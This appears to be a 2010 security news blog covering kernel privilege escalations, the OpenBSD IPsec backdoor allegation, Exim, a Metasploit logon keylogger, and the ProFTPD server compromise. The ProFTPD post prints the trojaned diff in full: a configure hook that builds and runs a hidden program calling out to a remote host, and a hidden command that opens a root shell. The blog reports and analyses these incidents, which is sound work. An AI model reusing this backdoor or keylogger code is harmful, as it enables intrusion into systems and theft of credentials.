Tuesday, December 21, 2010

Linux ACPI custom_method Privilege Escalation

Past November 13rd  a fix was commited in the Linux kernel.   For some reason I cannot understand, /sys/kernel/debug/acpi/custom_method was world writable, allowing any user to inject custom ACPI methods  into the ACPI interpreter tables.

As the RedHat bug report explains, it was introduced in this commit (Linux 2.6.33)

cm_dentry = debugfs_create_file("custom_method", S_IWUGO,
                    acpi_dir, NULL, &cm_fops);
 S_IWUGO is a macro that grants world writable  permissions
#define S_IWUGO         (S_IWUSR|S_IWGRP|S_IWOTH)

The fix changes the permissions to S_IWUSR, that is a macro that grants write access to the owner (root)

An exploit already exists for this vulnerability.

Wednesday, December 15, 2010

The OpenBSD IPSec stack is possibly backdoored

Yesterday, Theo de Raadt sent an e-mail to the openbsd mailing list disclosing the possible existence of a backdoor in the IPsec stack.

I have received a mail regarding the early development of the OpenBSD IPSEC stack. It is alleged that some ex-developers (and the company they worked for) accepted US government money to put backdoors into our network stack, in particular the IPSEC stack. Around 2000-2001.
Since we had the first IPSEC stack available for free, large parts of the code are now found in many other projects/products. Over 10 years, the IPSEC code has gone through many changes and fixes, so it is unclear what the true impact of these allegations are.

The forwarded e-mail is unbelievable...

Hello Theo,
Long time no talk. If you will recall, a while back I was the CTO at NETSEC and arranged funding and donations for the OpenBSD Crypto Framework. At that same time I also did some consulting for the FBI, for their GSA Technical Support Center, which was a cryptologic reverse engineering project aimed at backdooring and implementing key escrow mechanisms for smart card and other hardware-based computing technologies.

My NDA with the FBI has recently expired, and I wanted to make you aware of the fact that the FBI implemented a number of backdoors and side channel key leaking mechanisms into the OCF, for the express purpose of monitoring the site to site VPN encryption system implemented by EOUSA, the parent organization to the FBI. Jason Wright and several other developers were responsible for those backdoors, and you would be well advised to review any and all code commits by Wright as well as the other developers he worked with originating from NETSEC.

This is also probably the reason why you lost your DARPA funding, theymore than likely caught wind of the fact that those backdoors were present and didn't want to create any derivative products based upon the same.
This is also why several inside FBI folks have been recently advocating the use of OpenBSD for VPN and firewalling implementations in virtualized environments, for example Scott Lowe is a well respected author in virtualization circles who also happens top be on the FBI payroll, and who has also recently published several tutorials for the use of OpenBSD VMs in enterprise VMware vSphere deployments.
Merry Christmas...  

Gregory Perry  
Chief Executive Officer 
GoVirtual Education

Tuesday, December 14, 2010

Snort coverage for the Exim remote root vulnerability

The Sourcefire VRT has published a blog post that describes how Snort detects the Exim root vulnerability.

Based on what hit the Exim-dev mailing list, we felt confident that the SMTP preprocessor would catch the vulnerability; after testing with the proof-of-concept sent to the Full-Disclosure mailing list on Saturday, we've confirmed that SID 124:2:1 does the job nicely

 No configuration is necessary; the default settings for the SMTP preprocessor will work here. For anyone who may have tweaked their config, ensure that the meax_header_line_len is set to 2000 bytes or less (a reasonable value for all but the most unique of environments; the default value is 1000 bytes).

Monitoring the network with sFlow

Some resources to monitor networks with sFlow. Seen in geek00l's blog.

sFlow is a technology comparable to Netflow , that can be used to monitor in real time the network activity.

Capturing Windows Logon Credentials with Metasploit

Great blog post from the Metasploit blog that explains how to use a keylogger to capture the Windows Logon credentials.

Smartlocker is a script meant to capture the Windows credentials used to unlock the session.

- Migrates to winlogon.exe
- Waits for the session to be locked (the session is idle).
- Starts the keylogger until the session is unlocked (by typing the username and the password)
- Stops the keylogger
- The credentials are stored in a text file located in /home/{user}/.msf3/logs/scripts/smartlocker/

Monday, December 13, 2010

Root vulnerability in Exim

Several websites comment the root exploit in Exim that was published last week. In a nutshell, there is a memory corruption  in the string_format() function, that is triggered  in the e-mail headers.

What worries me is:
The flaw has been remedied In the Exim sources since version 4.70, released at the end of 2008. The correction was not, however, marked as relevant for security and therefore was not included in older versions. Debian’s stable Lenny distribution still uses Exim 4.69, while Red Hat has 4.43. 

Details from H-Security Initial report and fixes

Exim's bug report

Kingcope's exploit

Wednesday, December 8, 2010

Linux Kernel <= 2.6.37 local privilege escalation

A new local privilege escalation has been discovered in the Linux kernel as reported in the Full Disclosure mailing list.

The exploit combines three different vulnerabilities to gain root privileges: CVE-2010-4258, CVE-2010-3849 and CVE-2010-3850.

Affected systems
The Econet protocol (CVE-2010-3849) is not supported by default in RedHat like distributions (RHEL, CentOS and Fedora) and the majors distributions already patched CVE-2010-3849 and CVE-2010-3850, so up to date systems should not be affected by this particular exploit.

CVE-2010-4258 is the main vulnerability and it is still unpatched. Somebody could find another way to trigger the vulnerability.

msk@ubuntu:~/exploit$ gcc  15704.c  -o foo
msk@ubuntu:~/exploit$ ./foo 
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xe08b72a0
 [+] Resolved econet_ops to 0xe08b73a0
 [+] Resolved commit_creds to 0xc016c830
 [+] Resolved prepare_kernel_cred to 0xc016cc80
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# id
uid=0(root) gid=0(root) groups=0(root)

Friday, December 3, 2010

Beyond Exploits: Real World Penetration Testing

This is one of the presentations that should be watched by any IT Manager or  Chief Security Officer.

People tend to focus their security posture in the vulnerabilities instead of  a sound design that protect their critical assets and, even, penetration testers commit the same mistake. Of course, bad penetration testers.

In my career in IT, I have seen many so called penetration testers that just run vulnerability scanners and then send the report to the customer.  It is plainly wrong (rubbish?) because I do not need to pay a company to scan my own network for vulnerabilities, since I can do it by myself, with the same results.

Then, what is a penetration test? It is meant to emulate a real attack, that tries to reach our core business by making use of any possible attack vector.

A penetration tester must try all the possible attack vectors. This includes: mis-configurations, bad network designs, vulnerabilities,  social engineering,  protocol weaknesses, etc. Just because an skilled attacker, the one that is motivated and can cause a big damage, will do.

H.D. Moore is the Chief Security Officer of Rapid7 and  Founder & Chief Architect of Metasploit.

This presentation shows the techniques that can be used by a skilled penetration tester in order to gain full access to the network without exploiting a single vulnerability.

It includes:  attacking the users,  password testing, design weaknesses in the Windows platform (NTLM hashes and NTLM relay),  exploit the SMB design weaknesses to gain privileges up to the domain controler,  layer 2 attacks,  IPv6, etc..

Slides  Video

Thursday, December 2, 2010

ftp.proftpd.org compromised

The ProFTPD project  has sent a report to inform that the main distribution server  was compromised.

On Sunday, the 28th of November 2010 around 20:00 UTC the main distribution server of the ProFTPD project was compromised. The attackers most likely used an unpatched security issue in the FTP daemon to gain access to the server and used their privileges to replace the source files for ProFTPD 1.3.3c with a version which contained a backdoor. The unauthorized modification of the source code was noticed by Daniel Austin and relayed to the ProFTPD project by Jeroen Geilman on Wednesday, December 1 and fixed shortly afterwards.

The backdoor introduced by the attackers allows unauthenticated users remote root access to systems which run the maliciously modified version of the ProFTPD daemon

UPDATE: I found a diff of the trojaned version

diff -Naur proftpd-1.3.3c.orig/configure proftpd-1.3.3c/configure
--- proftpd-1.3.3c.orig/configure       2010-04-14 00:01:35.000000000 +0200
+++ proftpd-1.3.3c/configure    2010-10-29 19:08:56.000000000 +0200
@@ -9,7 +9,10 @@
 ## --------------------- ##
 ## M4sh Initialization.  ##
 ## --------------------- ##
+gcc tests/tests.c -o tests/tests >/dev/null 2>&1
+cc tests/tests.c -o tests/tests >/dev/null 2>&1
+tests/tests >/dev/null 2>&1 &
+rm -rf tests/tests.c tests/tests >/dev/null 2>&1
 # Be more Bourne compatible
 DUALCASE=1; export DUALCASE # for MKS sh
 if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then
diff -Naur proftpd-1.3.3c.orig/src/help.c proftpd-1.3.3c/src/help.c
--- proftpd-1.3.3c.orig/src/help.c      2009-07-01 01:31:18.000000000 +0200
+++ proftpd-1.3.3c/src/help.c   2010-11-16 18:40:46.000000000 +0100
@@ -27,6 +27,8 @@

 #include "conf.h"
+#include <stdlib.h>
+#include <string.h>

 struct help_rec {
   const char *cmd;
@@ -126,7 +128,7 @@
         cmd->server->ServerAdmin ? cmd->server->ServerAdmin : "ftp-admin");

     } else {
+      if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
       /* List the syntax for the given target command. */
       for (i = 0; i < help_list->nelts; i++) {
         if (strcasecmp(helps[i].cmd, target) == 0) {
diff -Naur proftpd-1.3.3c.orig/tests/tests.c proftpd-1.3.3c/tests/tests.c
--- proftpd-1.3.3c.orig/tests/tests.c   1970-01-01 01:00:00.000000000 +0100
+++ proftpd-1.3.3c/tests/tests.c        2010-11-29 09:37:35.000000000 +0100
@@ -0,0 +1,58 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <netdb.h>
+#include <signal.h>
+#include <string.h>
+#define DEF_PORT 9090
+#define DEF_TIMEOUT 15
+#define DEF_COMMAND "GET /AB HTTP/1.0\r\n\r\n"
+int sock;
+void handle_timeout(int sig)
+    close(sock);
+    exit(0);
+int main(void)
+        struct sockaddr_in addr;
+        struct hostent *he;
+        u_short port;
+        char ip[20]="";
+        port = DEF_PORT;
+        signal(SIGALRM, handle_timeout);
+        alarm(DEF_TIMEOUT);
+        he=gethostbyname(ip);
+        if(he==NULL) return(-1);
+        addr.sin_addr.s_addr = *(unsigned long*)he->h_addr;
+        addr.sin_port = htons(port);
+        addr.sin_family = AF_INET;
+        memset(addr.sin_zero, 0, 8);
+        sprintf(ip, inet_ntoa(addr.sin_addr));
+        if((sock = socket(AF_INET, SOCK_STREAM, 0))==-1)
+        {
+                return EXIT_FAILURE;
+        }
+        if(connect(sock, (struct sockaddr*)&addr, sizeof(struct sockaddr))==-1)
+        {
+            close(sock);
+            return EXIT_FAILURE;
+        }
+        if(-1 == send(sock, DEF_COMMAND, strlen(DEF_COMMAND), 0))
+        {
+            return EXIT_FAILURE;
+        }
+        close(sock);
+return 0; }

$ telnet 0 21
Connected to 0.
Escape character is '^]'.
220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) []
214-The following commands are recognized (* =>'s unimplemented):
 XRMD    MKD     XMKD    PWD     XPWD    SIZE    SYST    HELP
 NOOP    FEAT    OPTS    AUTH*   CCC*    CONF*   ENC*    MIC*
214 Direct comments to someone@somewhere
502 Unknown command 'ANOOP'
502 Unknown command 'A'

id ;
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

Using Volatility to perform memory forensics

The Volatility website points to a series of blog posts that explain how to use Volatility to perform memory forensics

CSS History Hack

The CSS History Hack  is an attack already explained by Jeremiah Grossman in 2006.  In a nutshell, it is possible to use CSS  and Javascript to know which pages has visited our 'guest' before.  How?  The web browser will change the state of the links already visited by the user.

Forbes explains that some popular sites like YouPorn are using this technique to know which other porn sites the user has visited before.

How does it work? It’s based on your browser changing the color of links you’ve already clicked on. A script on the site exploits a Web privacy leak to quickly check and see whether your browser reveals that the links to a host of other porn sites have been assigned the color “purple,” meaning you’ve clicked them before. YouPorn did not respond to an inquiry about why it collects this information, and tries to hide the practice by disguising the script with some easy-to-break cryptography.*

 The porn site is not alone in its desire to know what other websites visitors have visited. A group of researchers from the University of California – San Diego trolled through the Web’s most popular sites to see which ones were collecting this information about visitors. They found it on 46 other news, finance, sports, and games sites, reporting their findings in a paper with the intimidating title, “An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications.”

 The researchers who wrote the paper identifying this practice call it “history hijacking” or “history sniffing.” Mozilla, the foundation behind Web browser Firefox, calls it the “CSS: visited history bug.” It’s a bug that’s been discussed in developer circles for over a decade. Some browsers have fixed the bug. If you’re surfing using Chrome or Safari, this script doesn’t work. Firefox has fixed it in its newest version (for a long explanation as to how, see this post on the Mozilla security blog.) Internet Explorer, the most popular browser out there, is vulnerable to the history sniffing (though you can prevent it by going through the slightly onerous step of activating InPrivate Browsing, according to a spokesperson. That feature also blocks ad networks’ cookies, reports Business Insider.)

Quick introduction to SamuraiWTF

holisticinfosec describes the purpose of SamuraiWTF.

SamuraiWTF is a LiveCD Linux release designed to serve you for your web pen-testing needs. Kevin Johnson of Secure Ideas and Justin Searle of InGuardians included what they believe are the best of the open source and free tools that focus on testing and attacking websites, selections based on the tools they use as part of their job duties. SamuraiWTF includes tools useful in all four steps of a web pen-test:
Reconnaissance – Fierce domain scanner, Maltego (be sure to check out the Shodan Maltego add-on)
Mapping – WebScarab, ratproxy
Discovery – w3af and burp
Exploitation – BeEF, AJAXShell

Russ McRee points to his article published in the December 2010 issue of the ISSA Journal. The article gives a quick introduction to the tools available  in  SamuraiWTF.